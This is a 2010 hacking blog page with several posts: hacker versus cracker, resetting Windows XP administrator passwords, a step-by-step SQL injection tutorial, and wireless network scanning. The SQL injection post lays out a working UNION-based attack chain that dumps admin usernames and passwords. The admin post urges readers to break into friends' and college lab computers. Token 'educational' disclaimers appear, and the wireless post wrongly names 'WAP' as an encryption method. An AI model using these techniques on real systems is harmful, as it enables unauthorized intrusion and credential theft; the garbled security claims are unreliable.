New Post


Friday, December 31, 2010
Difference between Hacker and Cracker

Difference between Hacker and Cracker

Hello friends, today i am going to explain what is the difference between hacker and cracker. There are lots of articles on internet about the difference between hackers and crackers. In those articles authors or publishers often try to correct the public misconceptions. For many years, media has erroneously used the hacker word with a cracker. So the general public now believes hacker is someone who breaks into computer systems,hack passwords, websites and misuse them. But this is absolutely untrue and it demoralizes some of our most talented hackers.
 The greatness of misconception you can determine from the fact that world's biggest authentic source WIKIPEDIA has defined hackers in a incorrect way. Wikipedia has defined hackers in the following way...

"Hacking is unauthorized use of computer and network resources. (The term "hacker" originally meant a very gifted programmer. In recent years though, with easier access to multiple systems, it now has negative implications.)"
There is a very thin line difference between the hacker and cracker. Like a coin has two faces heads or tails, similar is true for computer experts. Some uses their techniques and expertize to help the others and secure the systems or networks and some misuses them and use that for their own selfish reasons. 

There are several traditional ways that determines the difference between the hackers and crackers. I will provide you these ways in order of their acceptance in the computer and IT market.  First of all, let me provide you the basic definitions of both hackers and crackers. 

These definitions are as follows:
Hackers : A Hacker is a person who is extremely interested in exploring the things and recondite workings of any computer system or networking system. Most often, hackers are the expert programmers. These are also called Ethical Hackers or white hat hackers. And the technique or hacking they perform is called ethical hacking.
Ethical Hacking Means you think like Hackers. i.e First you Hack the Systems and find out the loop holes and then try to correct those Loop Holes..These type of hackers protect the cyberworld from every possible threat and fixes the future coming security loop holes. These peoples are also called as "GURU's" of Computer Security. 
Crackers:  Crackers or Black Hat hackers or cheaters or simply criminals, they are called criminals because they are having the mindset of causing harm to security and they steals very useful data and use it in wrong ways. Phishers also come in this category who steals account info and steal your credit card nos. and money over the Net. 
 Below is the Diagrams which shows the basic difference between cracker or black hat hackers and Hackers or ethical hackers or white hat hackers.

hacking, hackers, hack computer system

I hope this will help you to clear most of your doubts about hackers and crackers. And the most important thing, until and unless a ethical hacker thinks like a cracker you can never become a expert ethical hacker because to get most out of any computer system you must understand the mindset of crackers that what they can do and up to what level they can damage. Now when you will identify the vulnerabilities and loopholes , If you fixes them so that in future anyone cannot breach that same vulnerability then you are Hacker or ethical hacker or White Hat hacker and if you utilize that loophole of misdeeds or for fun then its cracking or Black hat hacking. And black hat hackers are intelligent peoples but criminals or simply cyber cops call them evil genius.
For more such articles keep visiting our website or simple subscribe our post so that you can directly get this on your email.
If you have any query ask in form of comments. Also if you like the articles please comment to appreciate the post.
Thursday, December 30, 2010
How to hack admin or administrator account

How to hack admin or administrator account

Hello friends, welcome back today i am going to share with you all possible ways to hack admin or administrator account in windows XP. Today i will explain how to hack admin or administrator account in just 2 minutes. So guys get ready to hack your friends systems in 2 minutes.
Most of times specially in our college we don't have the access to the admin account, now suppose you want to install a software on that system. What you will do now? Ask the admin to enter the password for you or simply hack it by yourself. I will tell you frankly that i have never opted method one in my life. Whenever i need administrator right i have hacked it but guys don't do it like that ways because i got suspended from lab twice for doing that. 

how to hack admin password,hacking password,reset admin password, system hacking

There are four ways to hack the admin password:
1. Simply accessing Unprotected Administrator Account.
2. Hacking Through Net User Command.
3. Hacking Using the ERD(Emergency Rescue Disk)  Commander.
4. Resetting admin password using Ubuntu Live CD or DVD. 

Lets start from the first technique to hack the admin or administrator password..

1. Simply Accessing the Unprotected Admin or Administrator account.

How this hack works ? When we install windows XP on our system we usually rename the username as our name or some other keyword. But windows always creates the administrator account whenever we set up windows XP. So when you create your user account during install , windows creates two accounts that is one is your username account and other is Administrator account. But the main thing is that you will only see the account with your username and the Administrator account is hidden but its there and you can easily access that using the following steps:
Step1: Start your computer.
Step2: Now let it start until the windows user's username appears as shown in snapshot below...
how to hack admin password,hacking password,reset admin password, system hacking

Step3: As This Window Appears Press Ctrl+Alt +Delete (2 times).. Now the Windows like shown below appears..

how to hack admin password,reset admin password,hack computer password

Step4: Now as shown above Enter the Administrator on the Username box and press enter... Now you will be login in the admin account can easily rest the password...

For Resetting password you can follow two Procedures..
Procedure 1: Goto Start --> Control Panel --> User Accounts.. Now select the account whose password u want to reset.
Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

Note: Hack 1 will only work if Administrator(default) is unsecured i.e User as some other username like above shown figure...

2. Hacking admin or administrator account using net user command
Note: This will work only when user has access of user account or some how he has been allowed  or working in admin account.

Steps to hack admin account:
Step1: Goto the Start and click on Run and Type cmd and press enter ... 
Step 2: Now type "net user" in the command prompt to obtain the All accounts on that computer.. as shown in figure..

how to hack admin password,reset admin password,hack computer password,windows password hacking

Step 3: Now Select the account Which u want to Reset the Password...
Suppose that we want to Reset the Password  of Administrator...
Now Type "net user Administrator *  " Without quotes... and press Enter. As shown in the Below Figure..

reset admin password,hack computer password,windows password hacking

Step 4: Now after that press Enter Twice to rest the password. Now Next time u open that Account .. It will not require any Password..

3. Hacking admin account using ERD commander (100% working hack)
This hack has no restrictions , using this hack you can hack each and every computer.

First of all Download the ERD(Emergency Rescue Disk)  commander... Extract the Files and Make a CD...

1. Insert the ERD Commander Boot CD into the drive and restart the system
2. Boot the computer using ERD Commander Boot CD. You may have to set the boot order in the BIOS first.
3. Select your Windows XP installation from the list as shown.

How to hack Admin Account
4. From the ERD Commander menu (Start menu), click System Tools and click Locksmith
How to hack Admin Account

5. Click Next

How to hack Admin Account

6. Select the administrator account from the list for which you want to reset the password.
How to hack Admin Account

7. Type the new password in both the boxes, click Next and click Finish

How to hack Admin Account

8 . Restart The System and take the CD out of the Drive..And Enjoy Admin account...

Method 4: Resetting windows password using Ubuntu Live CD or DVD
For this hack you will require the Ubuntu Live CD.

Steps involved :

  1. Insert Ubuntu Live CD and boot from it.
  2. Open terminal and install chntpw in Ubuntu. To do so use the following commands.
    sudo apt-get update
    sudo apt-get install chntpw
  3. Now mount your Windows volume. In my case it was dev/sda1. Replace it with yours.
    sudo mkdir /media/WINDOWS
    sudo mount /dev/sda1 /media/WINDOWS
  4. Now navigate to the Windows configuration folder.
    cd /media/WINDOWS/WINDOWS/system32/config/
  5. To reset the administrator password enter
    sudo chntpw SAM
  6. After completing this command you will see 5 different choices. Select the 1st one and press Enter and its done. 
  7. Now restart your system, it will not ask any password. 

I hope you all have liked the topics for more such hacks keep visiting our website.
Wednesday, December 29, 2010
Hacking websites SQL injection tutorial

Hacking websites SQL injection tutorial

Hello friends in my previous class of How to hack websites, there i explained the various topics that we will cover in hacking classes. Let's today start with the first topic Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class don't worry read it here.

So guys let's start our tutorial of Hacking Websites using SQL injection technique. First of all, i will provide you the brief introduction about SQL injection.

Note: This article is for Educational Purposes only. Please Don't misuse it. Isoftdl and me are not responsible of any misuse done by you.

MySQL database is very common database system these days that websites use and you will surprise with the fact that its the most vulnerable database system ever.Its has unlimited loopholes and fixing them is a very tedious task. Here we will discuss how to exploit those vulnerabilities manually without any tool.

                                              Hacking Websites using SQL Injection


1. Finding the target and vulnerable websites

First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites.. Below is example of some queries..

Examples: Open the Google and copy paste these queries...












Search google for more google dorks to hack websites. I cannot put them on my website as they are too critical to discuss. We can discuss them in comments of this posts so keep posting and reading there.

2. Checking for Vulnerability on the website

Suppose we have website like this:-


To test this URL, we add a quote to it ‘


On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."Or something like that, that means the target website is vulnerable to sql injection and you can hack it.

3). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

h**p:// order by 1/* --> no error

h**p:// order by 2/* --> no error

h**p:// order by 3/* --> no error

h**p:// order by 4/* --> Error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

4). Check for UNION function

With union we can select more data in one sql statement.

So we have

h**p:// union all select 1,2,3/*

(we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

5). Check for MySQL version

h**p:// union all select 1,2,3/*

NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this

h**p:// union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

I didn't see any paper covering this problem, so i must write it .
What we need is convert() function
h**p:// union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()


h**p:// union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .

6). Getting table and column name

Well if the MySQL version is less than 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL greater than 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

h**p:// union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that's good )

We know that table admin exists...
Now to check column names.

h**p:// union all select 1,username,3 from admin/*

(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

h**p:// union all select 1,password,3 from admin/*

(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice
For that we can use concat() function (it joins strings)

h**p:// union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

h**p:// union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username:password on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.
If can't guess the right table name, you can always try mysql.user (default)
It has user password columns, so example would be

h**p:// union all select 1,concat(user,0x3a,password),3 from mysql.user/*

7). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL greater than 5.

For this we need information_schema. It holds all tables and columns in database.

To get tables we use table_name and information_schema.tables.


h**p:// union all select 1,table_name,3 from information_schema.tables/*

Here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

h**p:// union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1


h**p:// union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1


h**p:// union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

Here we use column_name and information_schema.columns

the method is same as above so example would be

h**p:// union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.

The second one (we change limit 0,1 to limit 1,1)


h**p:// union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...
If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.


h**p:// union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.


h**p:// union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from table users.


But the passwords are in hash format so we need to crack the hash. Note 90% of hash are crackable but 10% are still there which are unable to crack. So don't feel bad if some hash doesn't crack.

For Cracking the MD5 hash values you can use this :

1) Check the net whether this hash is cracked before:

2) Crack the password with the help of a site:


3) Use a MD5 cracking software:

Password = OwlsNest

I hope you all have liked it and surely got something how SQL injection works. For more website hacking tutorials keep visiting..


Tuesday, December 28, 2010
Hacking Wireless Networks - Part 2

Hacking Wireless Networks - Part 2

Welcome friends, yesterday i have introduced the topic " How to hack the wifi or wireless Networks" in which i have explained the various wireless scanning tools with their download links. Today i will explain you how to use them. So today we will discuss scanning of wireless networks so that we can get the list of wireless networks around us and we can try our hacks on them. So guys lets continue Hacking Wireless Networks - part 2.
Yesterday i have given you the list of topics that we cover in hacking wireless networks so lets continue the second topic.

2. Scanning the Wireless Networks or Wifi Networks

What is meant by scanning wireless networks? 
First of all we have to locate all the wireless networks around us. For this we have to do the scan for wireless networks its pity similar like we scan with antivirus for viruses in our system. Similarly we look for wireless networks around us with wireless scanning tools that i have mentioned yesterday.
Yesterday i have mentioned a lot of hack tools to scan the wireless networks but as i have said earlier my favorite is NetStumbler. Let's discuss now how to use NetStumbler?

Download NetStumbler from yesterday's post:

How to use NetStumbler for Scanning Wireless Networks?
1. Download the NetStumbler and Install it.

2. Run the NetStumbler. Then it will automatically starts scanning the wireless Networks around you.

3. Once its completed, you will see the complete list of wireless networks around you as shown in the snapshot below:

hacking wifi, hacking wireless,hacking wireless modem
List of Wireless Networks Scanned by NetStumbler
 There you will see different columns such as MAC, SSID, SPEED, VENDOR, TYPE and much more...

4. Now select anyone of the MAC address that you wish to hack and want to explore more about that. If you click on the MAC address of one of the discovered wireless networks under channels, you will see a graph that shows the wireless network’s signal strength. The more green and the less spaces are there,it indicates better is signal strength.

5. As you can see NetStumbler provides a lot more than just the name (SSID) of the wireless network. It provides the MAC address, Channel number, encryption type, and a bunch more. All of these come in use when we decides that we wants to get in the secured network by cracking the encryption. 

There are two most common types of Encryption Methods used by Wireless Networks:
a. WEP (Wired Equivalent Privacy) – WEP isn’t considered safe anymore. Many flaws have been discovered that allow hackers to crack a WEP key easily. I will explain how to hack the WEP in next tutorial so guys keep reading..
b. WAP (Wireless Application Protocol) – WAP is the currently the most secure and best option to secure your wireless network. It’s not as easily cracked as WEP because the only way to retrieve a WAP key is
to use a brute-force or dictionary attack. If your key is secure enough, a dictionary attack won’t work and it could take decades to crack it if you brute-force it. This is why most hackers don’t even bother. But I will explain you smarter ways to hack WAP keys also rather than these noobish methods. I will explain this in my next consecutive  tutorials. So guys keep visiting.

Thats all about scanning the wireless networks, if you want that i should explain the other tools then please post in comments. I can explain them in future on demand.
Now how can protect our wireless network from scanned by NetStumber.

How to Protect yourself from NetStumbler?
1. Don not broadcast your SSID.
2. Always try to use stronger passwords like atleast one digit, one special character, uppercase letters mixed with lowercase letters.
3. But second point doesn't matter much so try to use better encryption method i.e. WAP to password protect your wireless Network.

So guys that's all for today , I hope you all have liked it. So keep visiting to know more about hacking.

Monday, December 27, 2010
How to Hack wifi or wireless network - part 1

How to Hack wifi or wireless network - part 1

Hello Friends, this year is going to end and so for ending this year their must be something special. So today i will explain How to hack wifi or wireless network in just 10 to 15 minutes. In this tutorial of hacking wireless network i will explain from very start means tutorial of extremely novice users and also explain the ways to protect your wireless networks from hackers. So guys read on...

hacking wifi, hacking wireless,hacking wireless modem

Topics that we cover in this tutorial:
1. Wifi or Wireless Scanning tools
2. Scanning the Wireless Networks or Wifi Networks.
3. WEP hacking and cracking tools
4. Cracking the WEP key of wifi or Wireless Networks
5. Wireless Sniffing Tools
6. Wireless Sniffing technique
7. Security Measures to protect yourself from these attacks.

Guys you must know everything that's why i am explaining each and everything in this tutorials related to wireless networks or wifi hacking. Its a complete wireless network hacking tutorial with all hacking tools and how to use them. Using these you will came to know how to hack wifi or wireless networks and note guys this tutorial is 110% working like other one's.
Note: This article is only for Educational Purposes so that you can understand the loopholes in wireless networks and fix them. Any misuse can result in disastrous consequences like cyber crime.

Don't worry everything is ethical till you misuses it. So always try to be ethical as far as possible. Lets start from the first topic...

Scanning tools is needed to scan the wifi or wireless networks around you. First of all we need to scan all the wireless networks so that we can select the wireless network to hack. There are several wireless scanning tools but my favorite is NET STUMBLER. And for Mac operating systems is MacStumbler.
There are several Wireless scanning tools, a list of all wireless scanning tools is given below:
a. NetStumbler for Windows operating systems.
NetStumbler (also known as Network Stumbler) is a tool for Windows that facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards. It runs on Microsoft Windows 98 and above. A trimmed-down version called MiniStumbler is available for Windows CE.

NetStumbler is commonly used for:
  • Wardriving
  • Verifying network configurations
  • Finding locations with poor coverage in one’s WLAN
  • Detecting causes of wireless interference
  • Detecting unauthorized (”rogue”) access points
  • Aiming directional antennas for long-haul WLAN links

b. MacStumbler for Mac operating systems.
MacStumbler is a small utility to emulate the functionality of projects like netstumbler, bsd-airtools, and kismet. It's meant purely for educational or auditing purposes, although many people enjoy using these types of programs to check out how many WiFi (wireless) networks are in their area, usually known as "war driving".
MacStumbler only works with AirPort wireless cards, it does not (yet) work with any PCMCIA or USB wireless devices. 

c. Kismet for Windows and Linux.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic. Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

d. Redfang 2.5
Redfang is an application that finds non-discoverable Bluetooth devices by brute-forcing the last six bytes of the device's Bluetooth address and doing a read_remote_name().

e. THC-WarDrive
THC-WarDrive is a tool for mapping your city for wavelan networks with a GPS device while you are driving a car or walking through the streets. THC-WarDrive is effective and flexible, a "must-download" for all wavelan nerds.
f. PrismStumbler
Prismstumbler is software which finds 802.11 (WLAN) networks. It comes with an easy to use GTK2 frontend and is small enough to fit on a small portable system. It is designed to be a flexible tool to find as much information about wireless LAN installations as possible. Because of its client-server architecture the scanner engine may be used for different frontends. 

g. Mognet
Mognet is a free, open source wireless ethernet sniffer/analyzer written in Java. It is licensed under the GNU General Public License. It was designed with handheld devices like the iPaq in mind, but will run just as well on a desktop or laptop to find wireless networks.

h. WaveStumbler
WaveStumbler is console based 802.11 network mapper for Linux. It reports the basic AP stuff like channel, WEP, ESSID, MAC etc. It has support for Hermes based cards (Compaq, Lucent/Agere, … ) It still in development but tends to be stable. It consist of a patch against the kernel driver, orinoco.c which makes it possible to send the scan command to the driver viathe /proc/hermes/ethX/cmds file. The answer is then sent back via a netlink socket. WaveStumbler listens to this socket and displays the output data on the console.

i. StumbVerter
StumbVerter is a standalone application which allows you to import Network Stumbler's summary files into Microsoft's MapPoint 2002 maps. The logged WAPs will be shown with small icons, their colour and shape relating to WEP mode and signal strength.

j. AP Scanner
Wireless Access Point Utilites for Unix - it's a set of utilites to configure and monitor Wireless Access Points under Unix using SNMP protocol. Utilites knownly compiles and run under Linux, FreeBSD, NetBSD and AIX.

k. SSID Sniff
SSIDsniff is a nifty tool to use when looking to discover access points and save captured traffic. Comes with a configure script and supports Cisco Aironet and random prism2 based cards.

l. Wavemon
Wavemon is a ncurses based application for wireless hardware. It`s running currently under Linux with cards witch supported by Jean Tourrilhes wireless extensions. You will find them in the Kernel 2.4. I used this tool a few times, it`s small, works, opensource and good.

m. Wireless Security Auditor
Wireless Security Auditor allows network administrators to verify how secure a company’s wireless network is by executing an audit of accessible wireless networks. Featuring patent-pending cost-efficient GPU acceleration technologies, Elcomsoft Wireless Security Auditor attempts to recover the original WPA/WPA2 -PSK text passwords in order to test how secure your wireless environment is.

n. AirTraf
AirTraf 1.0 is a wireless sniffer that can detect and determine exactly what is being transmitted over 802.11 wireless networks. This open-source program tracks and identifies legitimate and rogue access points, keeps performance statistics on a by-user and by-protocol basis, measures the signal strength of network components, and more.

o. AirMagnet
AirMagnet WiFi Analyzer is the industry "de-facto" tool for mobile auditing and troubleshooting enterprise Wi-Fi networks. AirMagnet WiFi Analyzer helps IT staff quickly solve end user issues while automatically detecting network security threats and other wireless network vulnerabilities.

In my next class I will teach you how to use these scanning tools and all topics are covered in consecutive classes so guys keep visiting...

If you have any queries ask me !
Designed by Hackingloops.